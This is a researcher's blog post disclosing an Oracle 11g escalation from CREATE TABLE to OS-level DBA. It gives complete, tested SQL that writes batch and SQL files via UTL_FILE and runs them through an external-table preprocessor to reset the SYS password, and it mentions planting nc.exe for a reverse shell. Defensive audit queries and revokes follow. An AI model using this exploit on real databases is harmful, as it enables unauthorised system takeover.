CREATE TABLE to OSDBA
I have written a new paper entitled CREATE TABLE to OSDBA with reverse shell. The paper includes demo code for 11.1.0.7 Windows and UNIX (but not 10g).
The demo shows that granting EXECUTE on a directory in 11g to a user that possesses the common CREATE TABLE privilege is effectively equivalent to granting them OSDBA.
Once an OS-based shell script has been written via UTL_FILE (still executable by PUBLIC) and is executed by SELECTing from the external table, the .sh can act on any part of the OS owned by Oracle, thus bypassing any Oracle directory controls.
I will be discussing how to protect against this, as well as the growing number of unpublished 11g “CREATE SESSION to DBA” zero days, in the new SANS DAMS and Oracle 11g security course. Build up your flood defenses in preparation by attending the session below on December 5th:
http://www.sans.org/london09/description.php?tid=3602
Here’s the demo for Windows (see paper for UNIX OSDBA reverse shell demo).
--Prepare the low privilege attacker account
SQL> create user ctto identified by ctto;
User created.
SQL> grant create session to ctto;
Grant succeeded.
SQL> grant create table to ctto;
Grant succeeded.
SQL> grant all on directory log_dir to public;
Grant succeeded.
SQL> conn ctto/ctto
Connected.
SQL> select * from user_role_privs;
no rows selected
SQL> select * from user_sys_privs;
USERNAME                       PRIVILEGE                                ADM
------------------------------ ---------------------------------------- ---
CTTO                           CREATE SESSION                           NO
CTTO                           CREATE TABLE                             NO
SQL> select * from user_tab_privs;
no rows selected
--The low-privilege ctto account looks for a directory left open, which is usually the case. On 10g this would give only READ/WRITE,
--but on 11g there is the new EXECUTE privilege, which allows commands to be executed via the directory.
SELECT TABLE_NAME FROM ALL_TAB_PRIVS WHERE TABLE_NAME IN
(SELECT OBJECT_NAME FROM ALL_OBJECTS WHERE OBJECT_TYPE='DIRECTORY')
and privilege='EXECUTE' ORDER BY GRANTEE;
TABLE_NAME
------------------------------
LOG_DIR
SQL> SELECT DIRECTORY_PATH FROM ALL_DIRECTORIES WHERE DIRECTORY_NAME='LOG_DIR';
DIRECTORY_PATH
--------------------------------------------------------------------------
C:\SCRIPTS
Windows CREATE TABLE to SYSDBA and OSDBA
--Write a batch file to the OS that will call the second .sql (using PUBLIC UTL_FILE execute)
declare
f utl_file.file_type;
s varchar2(200) := 'sqlplus -S -L / as sysdba @c:\scripts\changepassword.sql';
begin
f := utl_file.fopen('LOG_DIR','changesyspw.bat','W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
/
--write the changepassword.sql that will be called by the batch file.
declare
f utl_file.file_type;
s varchar2(200) := 'alter user sys identified by newpassword;';
begin
f := utl_file.fopen('LOG_DIR','changepassword.sql','W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
/
--Execute shell script via external table http://structureddata.org/2008/11/19/preprocessor-for-external-tables/
CREATE TABLE execute_mybinary( "testrow" VARCHAR2(60))
ORGANIZATION EXTERNAL(
TYPE oracle_loader DEFAULT DIRECTORY LOG_DIR
ACCESS PARAMETERS (
RECORDS DELIMITED BY NEWLINE
PREPROCESSOR LOG_DIR:'changesyspw.bat' OPTIONS '-R'
BADFILE LOG_DIR:'execute_mybinary.bad'
LOGFILE LOG_DIR:'execute_mybinary.log'
FIELDS TERMINATED BY '|'
MISSING FIELD VALUES ARE NULL (
"testrow" ) )
LOCATION ('changesyspw.bat'))
REJECT LIMIT UNLIMITED;
--from another sys session
SQL> select password from sys.user$ where name='SYS';
PASSWORD
------------------------------
5638228DAF52805F
--as ctto low privilege user executes the .bat via the SELECT statement
select count(*) from execute_mybinary;
--You will receive a KUP-04095 error, but the script will still have changed the SYS password:
SQL> select password from sys.user$ where name='SYS';
PASSWORD
------------------------------
66A86F065449C773
--Tested and working on 11.1.0.7
SQL> select * from v$version;
BANNER
--------------------------------------------------------------------------
Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production
PL/SQL Release 11.1.0.7.0 - Production
CORE 11.1.0.7.0 Production
TNS for 32-bit Windows: Version 11.1.0.7.0 - Production
NLSRTL Version 11.1.0.7.0 - Production
Also, the low-privilege attacker can write an nc.exe binary to the OS using UTL_FILE binary mode, as per the method outlined in http://www.oracleforensics.com/wordpress/index.php/2008/10/10/create-any-directory-to-sysdba/
Given that there will always be new, unexpected attacks, it is essential to monitor DB user activity via a DAMS so that suspicious activity can be alerted on. http://www.sans.org/london09/description.php?tid=3602
Cheers,
Paul
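As an added defender's check (not part of the original paper), the following SQL, run as a DBA on 11g, audits the three preconditions the Windows demo above depends on: a directory object with EXECUTE (or WRITE) granted beyond its owner, UTL_FILE still executable by PUBLIC, and any existing external table that carries a PREPROCESSOR clause. The revokes at the end undo the exact grant used in the demo; the directory name LOG_DIR is taken from the demo, and the LIKE filter on ACCESS_PARAMETERS assumes that column is searchable as text (VARCHAR2 in 11g).

```sql
-- 1. Directory objects where EXECUTE or WRITE is granted to PUBLIC or to
--    any user other than SYS. EXECUTE on a directory plus CREATE TABLE is
--    the combination the demo turns into OS command execution as the
--    Oracle OS account (via an external table PREPROCESSOR).
SELECT p.grantee,
       p.table_name      AS directory_name,
       d.directory_path,
       p.privilege
FROM   dba_tab_privs   p
JOIN   dba_directories d ON d.directory_name = p.table_name
WHERE  p.privilege IN ('EXECUTE', 'WRITE')
AND    p.grantee  <> 'SYS'
ORDER  BY p.grantee, p.table_name, p.privilege;

-- 2. Is UTL_FILE (the primitive used to drop the .bat/.sql files) still
--    executable by PUBLIC?
SELECT grantee, privilege
FROM   dba_tab_privs
WHERE  owner      = 'SYS'
AND    table_name = 'UTL_FILE'
AND    grantee    = 'PUBLIC';

-- 3. External tables that already name a PREPROCESSOR: each one is a
--    stored OS command that runs whenever the table is SELECTed from.
SELECT owner,
       table_name,
       default_directory_name,
       access_parameters
FROM   dba_external_tables
WHERE  UPPER(access_parameters) LIKE '%PREPROCESSOR%'
ORDER  BY owner, table_name;

-- Remediation for the demo's own setup ("grant all on directory log_dir
-- to public"): take back the two privileges that matter.
REVOKE EXECUTE ON DIRECTORY log_dir FROM PUBLIC;
REVOKE WRITE   ON DIRECTORY log_dir FROM PUBLIC;

-- Record external-table creation by the CREATE TABLE holders so a DAMS or
-- the audit trail can alert on it (statement auditing, standard in 11g).
AUDIT CREATE TABLE BY ACCESS;
```

Query 1 should return no rows for PUBLIC on any directory; any EXECUTE grant it does return should be reviewed against the list of accounts that also hold CREATE TABLE (DBA_SYS_PRIVS).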